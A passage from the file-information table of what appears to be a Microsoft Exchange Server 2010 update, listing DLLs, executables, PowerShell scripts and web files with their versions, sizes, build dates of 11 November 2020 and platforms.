Microsoft.exchange.data.directory.eventlog.dll| 14.3.498.0| 76,904| 11-Nov-2020| 21:19| x64
Microsoft.exchange.data.dll| 14.3.509.0| 914,408| 11-Nov-2020| 21:19| x86
Microsoft.exchange.data.filedistributionservice.eventlog.dll| 14.3.498.0| 21,392| 11-Nov-2020| 21:19| x64
Microsoft.exchange.data.mapi.dll| 14.3.498.0| 213,968| 11-Nov-2020| 21:22| x86
Microsoft.exchange.data.providers.dll| 14.3.498.0| 177,096| 11-Nov-2020| 21:22| x86
Microsoft.exchange.data.storage.clientstrings.dll| 14.3.498.0| 91,088| 11-Nov-2020| 21:22| x86
Microsoft.exchange.data.storage.dll| 14.3.509.0| 5,280,736| 11-Nov-2020| 21:19| x86
Microsoft.exchange.data.storage.eventlog.dll| 14.3.498.0| 21,608| 11-Nov-2020| 21:19| x64
Microsoft.exchange.data.throttlingservice.client.dll| 14.3.498.0| 46,032| 11-Nov-2020| 21:22| x86
Microsoft.exchange.data.throttlingservice.client.eventlog.dll| 14.3.498.0| 12,696| 11-Nov-2020| 21:22| x64
Microsoft.exchange.data.throttlingservice.eventlog.dll| 14.3.498.0| 12,904| 11-Nov-2020| 21:20| x64
Microsoft.exchange.datacenterstrings.dll| 14.3.498.0| 74,864| 11-Nov-2020| 21:19| x86
Microsoft.exchange.diagnostics.dll| 14.3.498.0| 820,176| 11-Nov-2020| 21:22| x86
Microsoft.exchange.edgecredentialsvc.exe| 14.3.498.0| 21,608| 11-Nov-2020| 21:20| x86
Microsoft.exchange.edgesync.common.dll| 14.3.498.0| 160,672| 11-Nov-2020| 21:20| x86
Microsoft.exchange.edgesync.datacenterproviders.dll| 14.3.498.0| 226,408| 11-Nov-2020| 21:22| x86
Microsoft.exchange.edgesync.eventlog.dll| 14.3.498.0| 22,416| 11-Nov-2020| 21:20| x64
Microsoft.exchange.edgesyncsvc.exe| 14.3.498.0| 107,624| 11-Nov-2020| 21:20| x86
Microsoft.exchange.exchangecertificate.eventlog.dll| 14.3.498.0| 11,712| 11-Nov-2020| 21:21| x64
Microsoft.exchange.exchangecertificateservicelet.dll| 14.3.498.0| 46,184| 11-Nov-2020| 21:21| x86
Microsoft.exchange.extensibility.eventlog.dll| 14.3.498.0| 13,200| 11-Nov-2020| 21:20| x64
Microsoft.exchange.extensibility.internal.dll| 14.3.509.0| 439,280| 11-Nov-2020| 21:20| x86
Microsoft.exchange.groupmetrics.eventlog.dll| 14.3.498.0| 11,720| 11-Nov-2020| 21:21| x64
Microsoft.exchange.groupmetricsservicelet.dll| 14.3.509.0| 21,488| 11-Nov-2020| 21:21| x86
Microsoft.exchange.hathirdpartyreplication.dll| 14.3.498.0| 54,224| 11-Nov-2020| 21:23| x86
Microsoft.exchange.helpprovider.dll| 14.3.498.0| 45,976| 11-Nov-2020| 21:20| x86
Microsoft.exchange.imap4.eventlog.dll| 14.3.498.0| 16,832| 11-Nov-2020| 21:25| x64
Microsoft.exchange.imap4.exe| 14.3.509.0| 218,080| 11-Nov-2020| 21:25| x86
Microsoft.exchange.imap4service.exe| 14.3.498.0| 21,920| 11-Nov-2020| 21:25| x86
Microsoft.exchange.infoworker.assistantsclientresources.dll| 14.3.498.0| 45,984| 11-Nov-2020| 21:20| x86
Microsoft.exchange.infoworker.common.dll| 14.3.509.0| 1,467,360| 11-Nov-2020| 21:20| x86
Microsoft.exchange.infoworker.common.mailtips.groupmetricsreaderinterop.dll| 14.3.509.0| 16,864| 11-Nov-2020| 21:23| x86
Microsoft.exchange.infoworker.eventlog.dll| 14.3.498.0| 51,816| 11-Nov-2020| 21:20| x64
Microsoft.exchange.infoworker.meetingvalidator.dll| 14.3.498.0| 123,808| 11-Nov-2020| 21:23| x86
Microsoft.exchange.instantmessaging.dll| 14.3.498.0| 62,624| 11-Nov-2020| 21:23| x86
Microsoft.exchange.irm.formprotector.dll| 14.3.498.0| 152,216| 11-Nov-2020| 21:25| x64
Microsoft.exchange.irm.msoprotector.dll| 14.3.498.0| 52,160| 11-Nov-2020| 21:20| x64
Microsoft.exchange.irm.ofcprotector.dll| 14.3.498.0| 46,528| 11-Nov-2020| 21:25| x64
Microsoft.exchange.isam.esebcli.dll| 14.3.498.0| 88,480| 11-Nov-2020| 21:22| x64
Microsoft.exchange.isam.interop.dll| 14.3.498.0| 356,248| 11-Nov-2020| 21:19| x64
Microsoft.exchange.live.domainservices.dll| 14.3.498.0| 127,896| 11-Nov-2020| 21:19| x86
Microsoft.exchange.mailboxreplicationservice.common.dll| 14.3.509.0| 570,352| 11-Nov-2020| 21:22| x86
Microsoft.exchange.mailboxreplicationservice.dll| 14.3.498.0| 357,272| 11-Nov-2020| 21:22| x86
Microsoft.exchange.mailboxreplicationservice.eventlog.dll| 14.3.498.0| 23,488| 11-Nov-2020| 21:20| x64
Microsoft.exchange.mailboxreplicationservice.provider.dll| 14.3.498.0| 172,960| 11-Nov-2020| 21:22| x86
Microsoft.exchange.mailboxreplicationservice.proxyclient.dll| 14.3.498.0| 119,704| 11-Nov-2020| 21:22| x86
Microsoft.exchange.mailboxreplicationservice.proxyservice.dll| 14.3.509.0| 115,688| 11-Nov-2020| 21:20| x86
Microsoft.exchange.mailsubmission.eventlog.dll| 14.3.498.0| 15,256| 11-Nov-2020| 21:20| x64
Microsoft.exchange.management.controlpanel.dll| 14.3.509.0| 3,650,536| 11-Nov-2020| 21:19| x86
Microsoft.exchange.management.controlpanelmsg.dll| 14.3.498.0| 27,544| 11-Nov-2020| 21:22| x64
Microsoft.exchange.management.detailstemplates.dll| 14.3.498.0| 82,896| 11-Nov-2020| 21:19| x86
Microsoft.exchange.management.dll| 14.3.509.0| 12,284,896| 11-Nov-2020| 21:19| x64
Microsoft.exchange.management.edge.systemmanager.dll| 14.3.498.0| 70,816| 11-Nov-2020| 21:19| x86
Microsoft.exchange.management.nativeresources.dll| 14.3.498.0| 201,104| 11-Nov-2020| 21:21| x64
Microsoft.exchange.management.powershell.support.dll| 14.3.509.0| 103,408| 11-Nov-2020| 21:21| x86
Microsoft.exchange.management.publicfolders.dll| 14.3.498.0| 144,336| 11-Nov-2020| 21:19| x86
Microsoft.exchange.management.snapin.esm.dll| 14.3.509.0| 2,556,912| 11-Nov-2020| 21:19| x86
Microsoft.exchange.management.systemmanager.dll| 14.3.509.0| 1,274,848| 11-Nov-2020| 21:21| x86
Microsoft.exchange.managementgui.dll| 14.3.498.0| 5,412,000| 11-Nov-2020| 21:21| x86
Microsoft.exchange.managementmsg.dll| 14.3.498.0| 26,560| 11-Nov-2020| 21:19| x64
Microsoft.exchange.messagesecurity.dll| 14.3.498.0| 87,144| 11-Nov-2020| 21:20| x86
Microsoft.exchange.messagesecurity.messagesecuritymsg.dll| 14.3.498.0| 16,320| 11-Nov-2020| 21:22| x64
Microsoft.exchange.messagingpolicies.edgeagents.dll| 14.3.498.0| 74,856| 11-Nov-2020| 21:20| x86
Microsoft.exchange.messagingpolicies.eventlog.dll| 14.3.498.0| 20,632| 11-Nov-2020| 21:20| x64
Microsoft.exchange.messagingpolicies.journalagent.dll| 14.3.498.0| 107,632| 11-Nov-2020| 21:20| x86
Microsoft.exchange.messagingpolicies.redirectionagent.dll| 14.3.498.0| 25,192| 11-Nov-2020| 21:20| x86
Microsoft.exchange.messagingpolicies.rmsvcagent.dll| 14.3.498.0| 132,200| 11-Nov-2020| 21:20| x86
Microsoft.exchange.messagingpolicies.rules.dll| 14.3.498.0| 173,168| 11-Nov-2020| 21:20| x86
Microsoft.exchange.messagingpolicies.transportruleagent.dll| 14.3.498.0| 26,216| 11-Nov-2020| 21:20| x86
Microsoft.exchange.mobiledriver.dll| 14.3.498.0| 148,376| 11-Nov-2020| 21:20| x86
Microsoft.exchange.monitoring.eventlog.dll| 14.3.498.0| 11,928| 11-Nov-2020| 21:20| x64
Microsoft.exchange.monitoring.exe| 14.3.498.0| 66,464| 11-Nov-2020| 21:20| x86
Microsoft.exchange.net.dll| 14.3.509.0| 2,180,072| 11-Nov-2020| 21:19| x86
Microsoft.exchange.oabauthmodule.dll| 14.3.498.0| 18,840| 11-Nov-2020| 21:21| x86
Microsoft.exchange.oabmaintenance.eventlog.dll| 14.3.498.0| 13,768| 11-Nov-2020| 21:21| x64
Microsoft.exchange.oabmaintenanceservicelet.dll| 14.3.498.0| 50,072| 11-Nov-2020| 21:21| x86
Microsoft.exchange.pop3.eventlog.dll| 14.3.498.0| 15,808| 11-Nov-2020| 21:25| x64
Microsoft.exchange.pop3.exe| 14.3.498.0| 91,040| 11-Nov-2020| 21:25| x86
Microsoft.exchange.pop3service.exe| 14.3.498.0| 21,912| 11-Nov-2020| 21:25| x86
Microsoft.exchange.popimap.core.dll| 14.3.498.0| 152,480| 11-Nov-2020| 21:20| x86
Microsoft.exchange.powershell.configuration.dll| 14.3.498.0| 193,488| 11-Nov-2020| 21:21| x64
Microsoft.exchange.powershell.rbachostingtools.dll| 14.3.498.0| 74,704| 11-Nov-2020| 21:22| x86
Microsoft.exchange.protectedservicehost.exe| 14.3.498.0| 25,504| 11-Nov-2020| 21:21| x86
Microsoft.exchange.provisioningagent.dll| 14.3.509.0| 185,328| 11-Nov-2020| 21:21| x64
Microsoft.exchange.pst.dll| 14.3.498.0| 172,960| 11-Nov-2020| 21:22| x86
Microsoft.exchange.routingtablelogparser.dll| 14.3.509.0| 103,392| 11-Nov-2020| 21:22| x86
Microsoft.exchange.rpc.dll| 14.3.509.0| 866,800| 11-Nov-2020| 21:22| x64
Microsoft.exchange.rpcclientaccess.coexistence.dll| 14.3.498.0| 17,512| 11-Nov-2020| 21:25| x86
Microsoft.exchange.rpcclientaccess.dll| 14.3.498.0| 119,912| 11-Nov-2020| 21:25| x86
Microsoft.exchange.rpcclientaccess.exmonhandler.dll| 14.3.498.0| 66,672| 11-Nov-2020| 21:25| x86
Microsoft.exchange.rpcclientaccess.handler.dll| 14.3.509.0| 431,088| 11-Nov-2020| 21:25| x86
Microsoft.exchange.rpcclientaccess.parser.dll| 14.3.498.0| 595,048| 11-Nov-2020| 21:24| x86
Microsoft.exchange.rpcclientaccess.server.dll| 14.3.498.0| 103,320| 11-Nov-2020| 21:25| x86
Microsoft.exchange.rpcclientaccess.service.eventlog.dll| 14.3.498.0| 16,320| 11-Nov-2020| 21:20| x64
Microsoft.exchange.rpcclientaccess.service.exe| 14.3.498.0| 83,056| 11-Nov-2020| 21:20| x86
Microsoft.exchange.rpcoverhttpautoconfig.dll| 14.3.509.0| 58,336| 11-Nov-2020| 21:21| x86
Microsoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 14.3.498.0| 21,952| 11-Nov-2020| 21:21| x64
Microsoft.exchange.saclwatcher.eventlog.dll| 14.3.498.0| 13,968| 11-Nov-2020| 21:21| x64
Microsoft.exchange.saclwatcherservicelet.dll| 14.3.498.0| 20,072| 11-Nov-2020| 21:21| x86
Microsoft.exchange.search.exsearch.exe| 14.3.498.0| 410,576| 11-Nov-2020| 21:19| x86
Microsoft.exchange.search.exsearchmsg.dll| 14.3.498.0| 20,584| 11-Nov-2020| 21:22| x64
Microsoft.exchange.search.native.dll| 14.3.509.0| 131,568| 11-Nov-2020| 21:22| x64
Microsoft.exchange.security.dll| 14.3.509.0| 185,328| 11-Nov-2020| 21:19| x86
Microsoft.exchange.servicehost.eventlog.dll| 14.3.498.0| 13,256| 11-Nov-2020| 21:19| x64
Microsoft.exchange.servicehost.exe| 14.3.498.0| 28,776| 11-Nov-2020| 21:21| x86
Microsoft.exchange.services.dll| 14.3.509.0| 3,138,536| 11-Nov-2020| 21:20| x86
Microsoft.exchange.services.eventlogs.dll| 14.3.498.0| 25,536| 11-Nov-2020| 21:20| x64
Microsoft.exchange.setup.acquirelanguagepack.dll| 14.3.509.0| 46,064| 11-Nov-2020| 21:21| x86
Microsoft.exchange.setup.common.dll| 14.3.498.0| 447,384| 11-Nov-2020| 21:21| x86
Microsoft.exchange.setup.exsetupuihelper.dll| 14.3.498.0| 209,824| 11-Nov-2020| 21:21| x86
Microsoft.exchange.setup.signverfwrapper.dll| 14.3.498.0| 67,480| 11-Nov-2020| 21:21| x64
Microsoft.exchange.sqm.dll| 14.3.498.0| 58,320| 11-Nov-2020| 21:19| x86
Microsoft.exchange.storedriver.dll| 14.3.509.0| 549,856| 11-Nov-2020| 21:20| x86
Microsoft.exchange.storedriver.eventlog.dll| 14.3.498.0| 16,280| 11-Nov-2020| 21:20| x64
Microsoft.exchange.storeprovider.dll| 14.3.498.0| 853,104| 11-Nov-2020| 21:20| x86
Microsoft.exchange.structuredquery.dll| 14.3.498.0| 153,248| 11-Nov-2020| 21:22| x64
Microsoft.exchange.transport.agent.antispam.common.dll| 14.3.498.0| 70,760| 11-Nov-2020| 21:20| x86
Microsoft.exchange.transport.agent.contentfilter.cominterop.dll| 14.3.498.0| 22,640| 11-Nov-2020| 21:23| x86
Microsoft.exchange.transport.agent.headerconversion.dll| 14.3.498.0| 19,560| 11-Nov-2020| 21:20| x86
Microsoft.exchange.transport.agent.hygiene.dll| 14.3.509.0| 226,288| 11-Nov-2020| 21:20| x86
Microsoft.exchange.transport.agent.liveidauth.dll| 14.3.498.0| 17,008| 11-Nov-2020| 21:20| x86
Microsoft.exchange.transport.agent.prioritization.dll| 14.3.498.0| 38,000| 11-Nov-2020| 21:20| x86
Microsoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 14.3.498.0| 58,472| 11-Nov-2020| 21:20| x86
Microsoft.exchange.transport.agent.senderid.core.dll| 14.3.498.0| 66,664| 11-Nov-2020| 21:23| x86
Microsoft.exchange.transport.agent.trustedmailagents.dll| 14.3.498.0| 50,080| 11-Nov-2020| 21:20| x86
Microsoft.exchange.transport.dll| 14.3.498.0| 1,909,872| 11-Nov-2020| 21:19| x86
Microsoft.exchange.transport.eventlog.dll| 14.3.498.0| 97,224| 11-Nov-2020| 21:19| x64
Microsoft.exchange.transport.logging.search.dll| 14.3.498.0| 95,128| 11-Nov-2020| 21:22| x86
Microsoft.exchange.transport.sync.common.dll| 14.3.498.0| 435,104| 11-Nov-2020| 21:20| x86
Microsoft.exchange.transport.sync.common.eventlog.dll| 14.3.498.0| 11,712| 11-Nov-2020| 21:20| x64
Microsoft.exchange.transport.sync.worker.dll| 14.3.509.0| 1,065,968| 11-Nov-2020| 21:20| x86
Microsoft.exchange.transport.sync.worker.eventlog.dll| 14.3.498.0| 15,000| 11-Nov-2020| 21:20| x64
Microsoft.exchange.transportlogsearch.eventlog.dll| 14.3.498.0| 20,424| 11-Nov-2020| 21:22| x64
Microsoft.exchange.um.clientstrings.dll| 14.3.498.0| 70,560| 11-Nov-2020| 21:23| x86
Microsoft.exchange.um.lad.dll| 14.3.498.0| 116,640| 11-Nov-2020| 21:23| x64
Microsoft.exchange.um.prompts.dll| 14.3.498.0| 205,728| 11-Nov-2020| 21:20| x86
Microsoft.exchange.um.troubleshootingtool.shared.dll| 14.3.509.0| 95,216| 11-Nov-2020| 21:20| x86
Microsoft.exchange.um.ucmaplatform.dll| 14.3.498.0| 181,152| 11-Nov-2020| 21:23| x86
Microsoft.exchange.um.umcommon.dll| 14.3.509.0| 758,768| 11-Nov-2020| 21:23| x86
Microsoft.exchange.um.umcore.dll| 14.3.509.0| 1,377,264| 11-Nov-2020| 21:23| x86
Microsoft.exchange.unifiedmessaging.eventlog.dll| 14.3.498.0| 101,824| 11-Nov-2020| 21:20| x64
Microsoft.managementgui.dll| 14.3.498.0| 148,648| 11-Nov-2020| 21:19| x86
Microsoft.powershell.hostingtools.dll| 14.3.498.0| 83,112| 11-Nov-2020| 21:22| x86
Microsoft.powershell.hostingtools_2.dll| 14.3.498.0| 83,112| 11-Nov-2020| 21:19| x86
Migbase.dll| 14.3.509.0| 776,600| 11-Nov-2020| 21:22| x64
Migmsg.dll| 14.3.498.0| 84,376| 11-Nov-2020| 21:20| x64
Migrateumcustomprompts.ps1| Not applicable| 19,130| 11-Nov-2020| 21:21| Not applicable
Moveallreplicas.ps1| Not applicable| 15,215| 11-Nov-2020| 21:21| Not applicable
Movemailbox.ps1| Not applicable| 61,148| 11-Nov-2020| 21:21| Not applicable
Movetransportdatabase.ps1| Not applicable| 30,630| 11-Nov-2020| 21:21| Not applicable
Msallog.dll| 14.3.498.0| 39,528| 11-Nov-2020| 21:20| x64
Msexchangeadtopologyservice.exe| 14.3.509.0| 106,904| 11-Nov-2020| 21:25| x64
Msexchangefds.exe| 14.3.509.0| 103,408| 11-Nov-2020| 21:19| x86
Msexchangelesearchworker.exe| 14.3.498.0| 82,848| 11-Nov-2020| 21:21| x86
Msexchangemailboxassistants.exe| 14.3.509.0| 795,624| 11-Nov-2020| 21:20| x86
Msexchangemailboxreplication.exe| 14.3.498.0| 20,384| 11-Nov-2020| 21:20| x86
Msexchangemailsubmission.exe| 14.3.498.0| 111,520| 11-Nov-2020| 21:20| x86
Msexchangerepl.exe| 14.3.498.0| 62,416| 11-Nov-2020| 21:20| x86
Msexchangethrottling.exe| 14.3.498.0| 41,936| 11-Nov-2020| 21:20| x86
Msexchangetransport.exe| 14.3.498.0| 74,648| 11-Nov-2020| 21:19| x86
Msexchangetransportlogsearch.exe| 14.3.498.0| 205,720| 11-Nov-2020| 21:22| x86
Msfte1.dll| 14.0.7177.5001| 3,228,440| 11-Nov-2020| 21:22| x64
Msgedt.js| Not applicable| 4,778| 11-Nov-2020| 21:20| Not applicable
Msglst.js| Not applicable| 3,295| 11-Nov-2020| 21:20| Not applicable
Newtestcasconnectivityuser.ps1| Not applicable| 22,292| 11-Nov-2020| 21:21| Not applicable
Newtestcasconnectivityuserhosting.ps1| Not applicable| 24,607| 11-Nov-2020| 21:21| Not applicable
Ntspxgen.dll| 14.3.498.0| 80,272| 11-Nov-2020| 21:19| x64
Oabgen.dll| 14.3.509.0| 349,592| 11-Nov-2020| 21:22| x64
Ocemul.dll| 8.5.3.76| 54,112| 11-Nov-2020| 21:24| x64
Oilink.dll| 8.5.3.76| 464,736| 11-Nov-2020| 21:24| x86
Oilink.exe| 8.5.3.76| 317,280| 11-Nov-2020| 21:24| x64
Oilink.jar| Not applicable| 1,425,202| 11-Nov-2020| 21:24| Not applicable
Oitnsf.id| Not applicable| 4,688| 11-Nov-2020| 21:24| Not applicable
Oit_font_metrics.db| Not applicable| 375,808| 11-Nov-2020| 21:24| Not applicable
Oleconverter.exe| 14.3.498.0| 155,536| 11-Nov-2020| 21:19| x64
Oswin64.dll| 8.5.3.76| 103,272| 11-Nov-2020| 21:24| x64
Outsidein.dll| 8.5.3.76| 296,296| 11-Nov-2020| 21:24| x86
Owaauth.dll| 14.3.509.0| 97,688| 11-Nov-2020| 21:20| x64
Owasl.xap| Not applicable| 32,251| 11-Nov-2020| 21:20| Not applicable
Owasmime.msi| Not applicable| 2,301,952| 11-Nov-2020| 21:19| Not applicable
Owaspell.dll| 14.3.498.0| 43,416| 11-Nov-2020| 21:23| x64
Perfnm.h| Not applicable| 47,627| 11-Nov-2020| 21:25| Not applicable
Perf_common_extrace.dll| 14.3.498.0| 163,432| 11-Nov-2020| 21:22| x64
Perf_exchmem.dll| 14.3.498.0| 64,408| 11-Nov-2020| 21:22| x64
Perf_mdbsz.dll| 14.3.509.0| 49,560| 11-Nov-2020| 21:25| x64
Policytest.exe| 14.3.498.0| 44,440| 11-Nov-2020| 21:22| x64
Premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable
Preparemoverequesthosting.ps1| Not applicable| 71,003| 11-Nov-2020| 21:21| Not applicable
Prepare_moverequest.ps1| Not applicable| 
71,218| 11-Nov-2020| 21:21| Not applicable \nPublishedstartpage.js| Not applicable| 15,353| 11-Nov-2020| 21:20| Not applicable \nQuietexe.exe| 14.3.498.0| 14,752| 11-Nov-2020| 21:21| x86 \nReadpost.aspx| Not applicable| 6,516| 11-Nov-2020| 21:23| Not applicable \nReadsharingmessage.ascx| Not applicable| 5,235| 11-Nov-2020| 21:23| Not applicable \nReadvoicemailmessage.aspx| Not applicable| 9,320| 11-Nov-2020| 21:23| Not applicable \nRedir.aspx| Not applicable| 1,714| 11-Nov-2020| 21:23| Not applicable \nRedistributeactivedatabases.ps1| Not applicable| 116,795| 11-Nov-2020| 21:21| Not applicable \nReenable_auditloggingagent.ps1| Not applicable| 14,567| 11-Nov-2020| 21:21| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 22,562| 11-Nov-2020| 21:21| Not applicable \nRemoteexchange.ps1| Not applicable| 21,607| 11-Nov-2020| 21:21| Not applicable \nRemovereplicafrompfrecursive.ps1| Not applicable| 16,051| 11-Nov-2020| 21:21| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 15,355| 11-Nov-2020| 21:21| Not applicable \nReplacereplicaonpfrecursive.ps1| Not applicable| 16,452| 11-Nov-2020| 21:21| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 15,715| 11-Nov-2020| 21:21| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,715| 11-Nov-2020| 21:21| Not applicable \nReplaycrimsonevents.man| Not applicable| 247,121| 11-Nov-2020| 21:23| Not applicable \nReplaycrimsonmsg.dll| 14.3.498.0| 259,744| 11-Nov-2020| 21:23| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,504| 11-Nov-2020| 21:21| Not applicable \nResetcasservice.ps1| Not applicable| 21,735| 11-Nov-2020| 21:21| Not applicable \nResetsearchindex.ps1| Not applicable| 16,817| 11-Nov-2020| 21:21| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,197| 11-Nov-2020| 21:23| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,534| 11-Nov-2020| 21:21| Not applicable \nRightsmanagementwrapper.dll| 14.3.498.0| 79,304| 
11-Nov-2020| 21:23| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,460| 11-Nov-2020| 21:21| Not applicable \nRoutingview.exe| 14.3.509.0| 160,736| 11-Nov-2020| 21:22| x86 \nRulesauditmsg.dll| 14.3.498.0| 11,928| 11-Nov-2020| 21:23| x64 \nSccanno.dll| 8.5.3.76| 136,552| 11-Nov-2020| 21:24| x64 \nSccca.dll| 8.5.3.76| 46,944| 11-Nov-2020| 21:24| x64 \nSccch.dll| 8.5.3.76| 201,056| 11-Nov-2020| 21:24| x64 \nSccda.dll| 8.5.3.76| 151,904| 11-Nov-2020| 21:24| x64 \nSccdu.dll| 8.5.3.76| 617,824| 11-Nov-2020| 21:24| x64 \nSccex.dll| 8.5.3.76| 94,560| 11-Nov-2020| 21:24| x64 \nSccfa.dll| 8.5.3.76| 86,880| 11-Nov-2020| 21:24| x64 \nSccfi.dll| 8.5.3.76| 143,712| 11-Nov-2020| 21:24| x64 \nSccfmt.dll| 8.5.3.76| 75,616| 11-Nov-2020| 21:24| x64 \nSccfnt.dll| 8.5.3.76| 504,160| 11-Nov-2020| 21:24| x64 \nSccfut.dll| 8.5.3.76| 862,560| 11-Nov-2020| 21:24| x64 \nSccimg.dll| 8.5.3.76| 426,848| 11-Nov-2020| 21:24| x64 \nSccind.dll| 8.5.3.76| 68,960| 11-Nov-2020| 21:24| x64 \nScclo.dll| 8.5.3.76| 162,656| 11-Nov-2020| 21:24| x64 \nSccole2.dll| 8.5.3.76| 30,568| 11-Nov-2020| 21:24| x64 \nSccsd.dll| 8.5.3.76| 43,360| 11-Nov-2020| 21:24| x64 \nSccut.dll| 8.5.3.76| 2,001,248| 11-Nov-2020| 21:24| x64 \nSccxt.dll| 8.5.3.76| 54,624| 11-Nov-2020| 21:24| x64 \nServicecontrol.ps1| Not applicable| 48,237| 11-Nov-2020| 21:21| Not applicable \nSetup.com| 14.3.498.0| 444,928| 11-Nov-2020| 21:21| Not applicable \nSetup.exe| 14.3.498.0| 596,416| 11-Nov-2020| 21:21| x64 \nSmimeoptions.aspx| Not applicable| 10,805| 11-Nov-2020| 21:23| Not applicable \nSmimeparameterstandalone.js| Not applicable| 10,566| 11-Nov-2020| 21:21| Not applicable \nSmtpreceiveperfcounters.h| Not applicable| 1,014| 11-Nov-2020| 21:20| Not applicable \nSmtpreceiveperfcounters.ini| Not applicable| 11,910| 11-Nov-2020| 21:24| Not applicable \nSmtpreceiveperfcounters.xml| Not applicable| 3,439| 11-Nov-2020| 21:24| Not applicable \nSmtpsendperfcounters.h| Not applicable| 739| 11-Nov-2020| 21:24| Not applicable 
\nSmtpsendperfcounters.ini| Not applicable| 8,488| 11-Nov-2020| 21:24| Not applicable \nSmtpsendperfcounters.xml| Not applicable| 2,527| 11-Nov-2020| 21:24| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 24,974| 11-Nov-2020| 21:21| Not applicable \nStartpage.aspx| Not applicable| 10,891| 11-Nov-2020| 21:23| Not applicable \nStartpage.js| Not applicable| 177,388| 11-Nov-2020| 21:20| Not applicable \nStopdagservermaintenance.ps1| Not applicable| 17,945| 11-Nov-2020| 21:21| Not applicable \nStore.exe| 14.3.509.0| 6,934,408| 11-Nov-2020| 21:23| x64 \nStoretsconstants.ps1| Not applicable| 15,592| 11-Nov-2020| 21:23| Not applicable \nStoretslibrary.ps1| Not applicable| 25,360| 11-Nov-2020| 21:23| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 14.3.498.0| 30,152| 11-Nov-2020| 21:20| x64 \nTokenm.dll| 14.3.498.0| 59,792| 11-Nov-2020| 21:20| x64 \nTranscodingservice.exe| 14.3.498.0| 123,840| 11-Nov-2020| 21:20| x64 \nTroubleshoot_ci.ps1| Not applicable| 24,397| 11-Nov-2020| 21:23| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 23,679| 11-Nov-2020| 21:23| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 29,026| 11-Nov-2020| 21:23| Not applicable \nUglobal.js| Not applicable| 984,109| 11-Nov-2020| 21:20| Not applicable \nUmservice.exe| 14.3.498.0| 140,192| 11-Nov-2020| 21:20| x86 \nUmworkerprocess.exe| 14.3.498.0| 50,080| 11-Nov-2020| 21:23| x86 \nUninstall_antispamagents.ps1| Not applicable| 14,965| 11-Nov-2020| 21:23| Not applicable \nUpdatecas.ps1| Not applicable| 18,846| 11-Nov-2020| 21:21| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 27,082| 11-Nov-2020| 21:21| Not applicable \nUview.js| Not applicable| 178,233| 11-Nov-2020| 21:20| Not applicable \nVlv.js| Not applicable| 140,614| 11-Nov-2020| 21:20| Not applicable \nVsacad.dll| 8.5.3.76| 14,228,832| 11-Nov-2020| 21:24| x64 \nVsacs.dll| 8.5.3.76| 41,824| 11-Nov-2020| 21:24| x64 \nVsami.dll| 8.5.3.76| 74,592| 11-Nov-2020| 21:24| x64 \nVsarc.dll| 
8.5.3.76| 24,928| 11-Nov-2020| 21:24| x64 \nVsasf.dll| 8.5.3.76| 34,144| 11-Nov-2020| 21:24| x64 \nVsbdr.dll| 8.5.3.76| 27,488| 11-Nov-2020| 21:24| x64 \nVsbmp.dll| 8.5.3.76| 35,168| 11-Nov-2020| 21:24| x64 \nVscdrx.dll| 8.5.3.76| 22,880| 11-Nov-2020| 21:24| x64 \nVscgm.dll| 8.5.3.76| 53,600| 11-Nov-2020| 21:24| x64 \nVsdbs.dll| 8.5.3.76| 26,464| 11-Nov-2020| 21:24| x64 \nVsdez.dll| 8.5.3.76| 31,072| 11-Nov-2020| 21:24| x64 \nVsdif.dll| 8.5.3.76| 25,952| 11-Nov-2020| 21:24| x64 \nVsdrw.dll| 8.5.3.76| 36,192| 11-Nov-2020| 21:24| x64 \nVsdx.dll| 8.5.3.76| 30,560| 11-Nov-2020| 21:24| x64 \nVsdxla.dll| 8.5.3.76| 32,096| 11-Nov-2020| 21:24| x64 \nVsdxlm.dll| 8.5.3.76| 80,224| 11-Nov-2020| 21:24| x64 \nVsemf.dll| 8.5.3.76| 64,864| 11-Nov-2020| 21:24| x64 \nVsen4.dll| 8.5.3.76| 32,096| 11-Nov-2020| 21:24| x64 \nVsens.dll| 8.5.3.76| 29,536| 11-Nov-2020| 21:24| x64 \nVsenw.dll| 8.5.3.76| 29,024| 11-Nov-2020| 21:24| x64 \nVseps.dll| 8.5.3.76| 23,904| 11-Nov-2020| 21:24| x64 \nVseshr.dll| 8.5.3.76| 188,768| 11-Nov-2020| 21:24| x64 \nVsexe2.dll| 8.5.3.76| 53,088| 11-Nov-2020| 21:24| x64 \nVsfax.dll| 8.5.3.76| 26,464| 11-Nov-2020| 21:24| x64 \nVsfcd.dll| 8.5.3.76| 27,488| 11-Nov-2020| 21:24| x64 \nVsfcs.dll| 8.5.3.76| 31,072| 11-Nov-2020| 21:24| x64 \nVsfft.dll| 8.5.3.76| 29,536| 11-Nov-2020| 21:24| x64 \nVsflw.dll| 8.5.3.76| 154,464| 11-Nov-2020| 21:24| x64 \nVsfwk.dll| 8.5.3.76| 45,920| 11-Nov-2020| 21:24| x64 \nVsgdsf.dll| 8.5.3.76| 89,440| 11-Nov-2020| 21:24| x64 \nVsgif.dll| 8.5.3.76| 31,584| 11-Nov-2020| 21:24| x64 \nVsgzip.dll| 8.5.3.76| 37,216| 11-Nov-2020| 21:24| x64 \nVshgs.dll| 8.5.3.76| 50,016| 11-Nov-2020| 21:24| x64 \nVshtml.dll| 8.5.3.76| 517,984| 11-Nov-2020| 21:24| x64 \nVshwp.dll| 8.5.3.76| 91,488| 11-Nov-2020| 21:24| x64 \nVshwp2.dll| 8.5.3.76| 111,968| 11-Nov-2020| 21:24| x64 \nVsich.dll| 8.5.3.76| 136,032| 11-Nov-2020| 21:24| x64 \nVsich6.dll| 8.5.3.76| 62,816| 11-Nov-2020| 21:24| x64 \nVsid3.dll| 8.5.3.76| 53,088| 11-Nov-2020| 21:24| x64 \nVsimg.dll| 
